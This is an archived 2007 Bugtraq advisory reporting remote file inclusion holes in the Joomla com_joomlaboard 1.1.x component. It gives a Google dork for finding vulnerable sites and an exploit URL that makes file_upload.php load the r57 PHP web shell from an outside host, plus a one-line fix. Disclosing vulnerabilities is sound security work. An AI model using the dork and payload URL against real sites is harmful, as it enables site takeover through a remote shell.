lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 23 Mar 2007 20:48:18 +0000
From: "Cold - Zero" <c.o.1.d.0@...mail.com>
To: Bugtraq@...urityfocus.com
Subject: Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabi


######################################################
#
# Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include 
Vulnerabilities
# Joomlaboard Component 1.1.x Branch (sbp) Multiple Remote File Include 
Vulnerabilities
#
######################################################
#
# script :
http://forge.joomla.org/sf/frs/do/viewRelease/projects.simpleboard/frs.joomlaboard_component.joomlaboard_1_1_x_branch
#
######################################################
#
# files : /image_upload.php , /file_upload.php ,
#
######################################################
#
# Dork : index2.php?option=com_joomlaboard , allinurl:"com_joomlaboard"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@...mail.com , 
http://hack-teach.com/ , Team Hell Crew
#
######################################################
#
# require_once("$sbp/sb_helpers.php");
# require_once("$sbp/sb_helpers.php");
#
######################################################
#
# exploit : 
http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
#               
http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
#
######################################################
#
# How To Fix It : U can put this code - defined( '_VALID_MOS' ) or die( 
'Catch Me iF u Can ### Patched By Cold z3ro .' ); - after <?php code start
#
######################################################


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

_________________________________________________________________
5.5%* 30 year fixed mortgage rate. Good credit refinance. Up to 5 free 
quotes - *Terms 
https://www2.nextag.com/goto.jsp?product=100000035&url=%2fst.jsp&tm=y&search=mortgage_text_links_88_h2a5d&s=4056&p=5117&disc=y&vers=910

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ